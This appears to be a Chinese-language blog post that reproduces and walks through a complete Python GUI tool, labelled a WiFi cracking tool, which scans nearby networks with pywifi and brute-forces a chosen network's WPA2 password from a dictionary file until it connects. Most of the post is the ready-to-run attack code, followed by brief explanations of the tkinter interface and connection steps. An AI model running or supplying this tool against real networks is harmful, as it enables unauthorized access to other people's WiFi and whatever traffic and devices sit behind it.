#是這樣的,本想着自己寫點啥東西,用python,發現轉一圈不知道啥好。就抱着學習的態度,研究了以下破解wifi密碼的代碼
先貼上代碼,然後一段段分析
# coding:utf-8
from tkinter import *
from tkinter import ttk
import pywifi
from pywifi import const
import time
import tkinter.filedialog
import tkinter.messagebox
class MY_GUI():
def __init__(self,init_window_name):
self.init_window_name = init_window_name
#密碼文件路徑 StringVar()這個函數幹嘛用的?
self.get_value = StringVar()
#獲取破解wifi賬號
self.get_wifi_value = StringVar()
#獲取wifi密碼
self.get_wifimm_value = StringVar()
self.wifi = pywifi.PyWiFi() #抓取網卡接口
self.iface = self.wifi.interfaces()[0] #抓取第一個無線網卡
self.iface.disconnect() #測試鏈接斷開所有鏈接
time.sleep(1) #休眠1秒
#測試網卡是否屬於斷開狀態
assert self.iface.status() in\
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
def __str__(self):
return '(WIFI:%s,%s)' % (self.wifi,self.iface.name())
#設置窗口
def set_init_window(self):
self.init_window_name.title("WIFI破解工具")
self.init_window_name.geometry('+500+200') # x*y +|-x +|-y 前面表長寬 後面表相對於屏幕的位置
labelframe = LabelFrame(width=400, height=200,text="配置")
labelframe.grid(column=0, row=0, padx=10, pady=10)
self.search = Button(labelframe,text="搜索附近WiFi",command=self.scans_wifi_list).grid(column=0,row=0)
self.pojie = Button(labelframe,text="開始破解",command=self.readPassWord).grid(column=1,row=0)
self.label = Label(labelframe,text="目錄路徑:").grid(column=0,row=1)
self.path = Entry(labelframe,width=12,textvariable = self.get_value).grid(column=1,row=1)
self.file = Button(labelframe,text="添加密碼文件目錄",command=self.add_mm_file).grid(column=2,row=1)
self.wifi_text = Label(labelframe,text="WiFi賬號:").grid(column=0,row=2)
self.wifi_input = Entry(labelframe,width=12,textvariable = self.get_wifi_value).grid(column=1,row=2)
self.wifi_mm_text = Label(labelframe,text="WiFi密碼:").grid(column=2,row=2)
self.wifi_mm_input = Entry(labelframe,width=10,textvariable = self.get_wifimm_value).grid(column=3,row=2,sticky=W) #sticky對齊方式
self.wifi_labelframe = LabelFrame(text="wifi列表")
self.wifi_labelframe.grid(column=0, row=3,columnspan=4,sticky=NSEW)
# 定義樹形結構與滾動條
self.wifi_tree = ttk.Treeview(self.wifi_labelframe,show="headings",columns=("a", "b", "c", "d"))
self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
self.wifi_tree.configure(yscrollcommand=self.vbar.set)
# 表格的標題
self.wifi_tree.column("a", width=50, anchor="center")
self.wifi_tree.column("b", width=100, anchor="center")
self.wifi_tree.column("c", width=100, anchor="center")
self.wifi_tree.column("d", width=100, anchor="center")
self.wifi_tree.heading("a", text="WiFiID")
self.wifi_tree.heading("b", text="SSID")
self.wifi_tree.heading("c", text="BSSID")
self.wifi_tree.heading("d", text="signal")
self.wifi_tree.grid(row=4,column=0,sticky=NSEW)
self.wifi_tree.bind("<Double-1>",self.onDBClick)
self.vbar.grid(row=4,column=1,sticky=NS)
#搜索wifi
#cmd /k C:\Python27\python.exe "$(FULL_CURRENT_PATH)" & PAUSE & EXIT
def scans_wifi_list(self): # 掃描周圍wifi列表
#開始掃描
print("^_^ 開始掃描附近wifi...")
self.iface.scan()
time.sleep(15)
#在若干秒後獲取掃描結果
scanres = self.iface.scan_results()
#統計附近被發現的熱點數量
nums = len(scanres)
print("數量: %s"%(nums))
#print ("| %s | %s | %s | %s"%("WIFIID","SSID","BSSID","signal"))
# 實際數據
self.show_scans_wifi_list(scanres)
return scanres
#顯示wifi列表
def show_scans_wifi_list(self,scans_res):
for index,wifi_info in enumerate(scans_res):
# print("%-*s| %s | %*s |%*s\n"%(20,index,wifi_info.ssid,wifi_info.bssid,,wifi_info.signal))
self.wifi_tree.insert("",'end',values=(index + 1,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
#print("| %s | %s | %s | %s \n"%(index,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
#添加密碼文件目錄
def add_mm_file(self):
self.filename = tkinter.filedialog.askopenfilename()
self.get_value.set(self.filename)
#Treeview綁定事件
def onDBClick(self,event):
self.sels= event.widget.selection()
self.get_wifi_value.set(self.wifi_tree.item(self.sels,"values")[1])
#print("you clicked on",self.wifi_tree.item(self.sels,"values")[1])
#讀取密碼字典,進行匹配
def readPassWord(self):
self.getFilePath = self.get_value.get()
#print("文件路徑:%s\n" %(self.getFilePath))
self.get_wifissid = self.get_wifi_value.get()
#print("ssid:%s\n" %(self.get_wifissid))
self.pwdfilehander=open(self.getFilePath,"r",errors="ignore")
while True:
try:
self.pwdStr =self.pwdfilehander.readline()
#print("密碼: %s " %(self.pwdStr))
if not self.pwdStr:
break
self.bool1=self.connect(self.pwdStr,self.get_wifissid)
#print("返回值:%s\n" %(self.bool1) )
if self.bool1:
# print("密碼正確:"+pwdStr
# res = "密碼:%s 正確 \n"%self.pwdStr;
self.res = "===正確=== wifi名:%s 匹配密碼:%s "%(self.get_wifissid,self.pwdStr)
self.get_wifimm_value.set(self.pwdStr)
tkinter.messagebox.showinfo('提示', '破解成功!!!')
print(self.res)
break
else:
# print("密碼:"+self.pwdStr+"錯誤")
self.res = "---錯誤--- wifi名:%s匹配密碼:%s"%(self.get_wifissid,self.pwdStr)
print(self.res)
sleep(3)
except:
continue
#對wifi和密碼進行匹配
def connect(self,pwd_Str,wifi_ssid):
#創建wifi鏈接文件
self.profile = pywifi.Profile()
self.profile.ssid =wifi_ssid #wifi名稱
self.profile.auth = const.AUTH_ALG_OPEN #網卡的開放
self.profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
self.profile.cipher = const.CIPHER_TYPE_CCMP #加密單元
self.profile.key = pwd_Str #密碼
self.iface.remove_all_network_profiles() #刪除所有的wifi文件
self.tmp_profile = self.iface.add_network_profile(self.profile)#設定新的鏈接文件
self.iface.connect(self.tmp_profile)#鏈接
time.sleep(5)
if self.iface.status() == const.IFACE_CONNECTED: #判斷是否連接上
isOK=True
else:
isOK=False
self.iface.disconnect() #斷開
time.sleep(1)
#檢查斷開狀態
assert self.iface.status() in\
[const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
return isOK
def gui_start():
init_window = Tk()
ui = MY_GUI(init_window)
print(ui)
ui.set_init_window()
#ui.scans_wifi_list()
init_window.mainloop()
gui_start()
代碼可分爲兩部分
- 界面編寫
- WiFi連接
界面編寫
1.本次界面編寫使用的是python內置的GUI包,tkinter。我只接觸過easygui,哈哈哈哭了。
2.將TK實例化並初始化,最好調用mainloop()
將標籤顯示在屏幕上,隨時準備響應GUI事件,print(ui)就是返回MY_GUI對象而已,不是顯示界面不要誤會
3.init_window_name是傳入的TK類對象,geometry是控制界面的大小與位置,
x*y +|-x +|-y 前面表長寬 後面表相對於屏幕的位置
LabelFrame 是tk中的一種組件,類似於一個容器。
grid是製表的意思,其中padx,pady是間距距離,單位是像素
4.command類似QT信號和槽的關係,綁定一個事件,
這裏的grid 表示組件的位置
textvariable,很特殊,需要與某個變量綁定,這個變量有要求,當變量改變,textvariable也會綁定改變。
被綁定的變量,用StringVar獲得
sticky參數是對齊方式,NSEW我猜測是居中的意思
後面的不想講了累了。
WIFI連接
初始化檢測,斷開wifi連接
assert 斷言,後的條件爲假,報異常。
調用scan函數掃描wifi,用scan_results得到掃描結果。
顯示結果,enumerate這個函數將一個可遍歷的,變成索引數列。插入到樹結構中顯示。
綁定的鼠標點擊事件
暴力破解,用密碼本中的密碼依次嘗試,
try
except
異常處理
連接wifi函數
是pywifi模塊的主要內容
連接過程:
先創建wifi連接文件,填入文件相關信息,刪除接口之前的所有連接文件,將剛創建的連接文件設置爲新的連接文件,使用connect函數連接,查看接口狀態看是否連接成功
詳細信息可查閱
https://blog.csdn.net/QQB67G8COM/article/details/94360855
運行結果: